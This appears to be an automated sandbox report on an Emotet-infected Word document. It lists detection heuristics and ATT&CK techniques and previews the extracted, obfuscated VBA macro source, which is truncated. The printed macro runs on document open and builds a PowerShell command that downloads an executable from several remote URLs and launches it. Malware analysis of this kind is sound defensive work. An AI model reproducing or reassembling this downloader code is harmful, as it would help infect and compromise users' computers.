MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The AutoOpen macro is present and attempts to execute obfuscated code. ClamAV detection confirms this is Doc.Downloader.Emotet-6884101-0, a known downloader. The VBA script likely downloads and executes a second-stage payload, a common Emotet tactic.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6884101-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884101-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4589 bytes |
SHA-256: 9198a6664b6c2de206e24e63a47621af31a7a73056f4e098646fe35d4009277b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MbzVSCiir"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "kYkwAkFuU" + "BUmp"
VBA.Shell KeyString(9 + 10 + 7 + 3 + 38) + LsdzqiswKlE + YcmXbnqqzjY + QsJVIZZjWt + KCAiXpf + piKFTHEKRYKAut + pzARrpZ, 39 - 39
Hour "OO" + "6746"
Hour "lFS" + "YSGDcXhtw" + "IkYdGzEcqFt" + "aEPEzCF"
Hour "IF" + "s"
Hour "523709441" + "86618552"
End Sub
Attribute VB_Name = "jhCtZjWFr"
Function QsJVIZZjWt()
On _
Error _
Resume _
Next
Hour "8515" + "RSAvpLdi"
Hour "BDZD" + "ZWJakL" + "4317" + "JZrq"
EUNjTVu = "md " + "/V^:^O/" + "C" + Chr(0 + 2 + 5 + 5 + 22) + "s^" + "et " + "^1P" + "^" + "2m=" + " ^ ^ ^" + " " + " ^ " + "^" + " ^ " + "^ "
Hour "YiiVFJn" + "343" + "jsYOf" + "oLi"
Hour "dQAht" + "r"
QKKmjfjGa = "^}}{h" + "c" + "tac^}^;" + "kaer" + "^" + "b;Wq^z" + "^$"
Hour "9235" + "G" + "PjHMiiIMMYqj" + "4184"
Hour "aAIi" + "9971" + "BF" + "WDPEZRhsE"
Hour "BzwRoO" + "XwkQOC"
OKcmiK = " m^" + "e^t^" + "I^" + "-" + "e" + "^ko"
Hour "192030899" + "W" + "6535" + "LObiUPC"
Hour "w" + "p"
aMhDaSML = "vn" + "I;" + ")" + "Wqz$ ^" + ",Un^Q" + "^$(^" + "e^l^" + "iF^d^ao" + "ln^w" + "o^D.K" + "Mv^$"
Hour "UYKXfJFstldsZ" + "2507"
Hour "260049142" + "LpdUNUT"
Hour "EcqiowjQrdNo" + "JvTEhZiDW"
cZFzO = "^{^yrt" + "{)aV" + "X$^ n^" + "i ^Un" + "Q^$(^" + "hca^er" + "of^;'e" + "^" + "x^e" + ".^"
Hour "5518" + "Mowj" + "436126605" + "hjf"
Hour "J" + "tmnicvK"
NjXruuGDDh = "'" + "^+i" + "n^z" + "$^+'\^'" + "+c^i" + "lbu" + "p:" + "vn" + "^e$=^Wq" + "^z^$^" + ";^'7"
Hour "GXGiF" + "oukn" + "RRnWL" + "807"
Hour "27250545" + "liY" + "vtjD" + "jrNV"
Hour "Pdmrfoi" + "S" + "GwvPdOZazDQLvm" + "zfGcvfRYJMS"
ZIqwciGNT = "^0" + "8^' =^ " + "in^z$^;" + ")" + "^'^@^'(" + "^t^i" + "^l^pS." + "^'^7^" + "En/k" + "s.r" + "^" + "e^ll"
Hour "145539250" + "iK"
Hour "zEjJXXXUpZ" + "3126" + "DLp" + "T"
Hour "481460324" + "w" + "wkEc" + "Uu"
Hour "hFaw" + "OrqKdrvNBIlYU"
VhoEiX = "^im-" + "hca^b" + "hcsi" + "^" + "f//:" + "ptth@" + "^m^yv" + "a^3^" + "HQ/^moc" + "^.^yr" + "tn" + "u" + "^oce^h^"
Hour "HALRRjMtcuMkva" + "htN" + "9687" + "WXYz"
Hour "8104" + "477685144"
crCUnITOId = "tn^in" + "w^o^d/" + "/:" + "pt" + "^t" + "h^@p^p" + "x^3^3" + "^zx/moc" + "^.s^a^e" + "^s^-" + "iiv/" + "/^:ptth"
Hour "iNXAwaJdXIJ" + "CwoZ" + "IN" + "9971"
Hour "KiahBD" + "jBnBKudj" + "tN" + "9285080"
CRPzmFt = "@u^0^" + "s^d/^m" + "^oc" + "^.^b^al" + "hsol" + "c//:^p^" + "tt^h^@" + "^" + "y^BsDr5" + "^D^J/^s" + "^ed"
Hour "tYkQLYizv" + "CS" + "Yiw" + "zXiuWU"
adYNRwYJza = "^" + "ulc" + "n^i/ni" + "^md^" + "a^" + "-p" + "w/mo" + "c^.r" + "^e^m^a" + "git^l^"
Hour "V" + "U"
Hour "DDiRJqQpf" + "255308434" + "jGXw" + "4457"
Hour "181301870" + "ZG"
Hour "330024640" + "384027068" + "FCHaQnDBXEc" + "ECaikV"
ndoZmwK = "u." + "w^" + "ww//:" + "^p^tt" + "^h'" + "^=" + "aV^X^" + "$;^" + "tn^e" + "^ilC" + "^"
QsJVIZZjWt = EUNjTVu + QKKmjfjGa + OKcmiK + aMhDaSML + cZFzO + NjXruuGDDh + ZIqwciGNT + VhoEiX + crCUnITOId + CRPzmFt + adYNRwYJza + ndoZmwK
Hour "I" + "220133100"
Hour "97154170" + "KQwJ"
Hour "QEMkiQ" + "jtFOmlcRF" + "7415" + "CzcNwi"
End Function
Function KCAiXpf()
On _
Error _
Resume _
Next
Hour "vO" + "225418518" + "GHTijmWR" + "250794159"
iDcrPv = "b" + "e" + "^W.^te" + "N ^tc^e" + "^jb" + "o^-we" + "n^=K" + "^Mv^$ " + "ll^e" + "^hsr^e^" + "w"
Hour "PtNOsQWPXF" + "uJSG"
Hour "LN" + "Ulpn"
Hour "LMJPcUzGnUN" + "455925256" + "304860899" + "EZPzMV"
Hour "DBpvnULRMUlUI" + "1620" + "2606" + "kf"
TmlhFzcVz = "op&&^f" + "^or " + "/^" + "L %^Y ^" + "in ("
Hour "aisG" + "hCC"
jVPaYjuJt = "^3" + "81^," + "-^1,^0" + ")d^o" + " " + "s^e^t " + "^" + "7^Y^" + "z=!^7" + "^Y^z!"
Hour "5617" + "6863" + "vDbmloYVwhjr" + "1216"
ZPOKmZ = "!^" + "1" + "P^2m:~" + "%" + "^Y,1!" + "
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.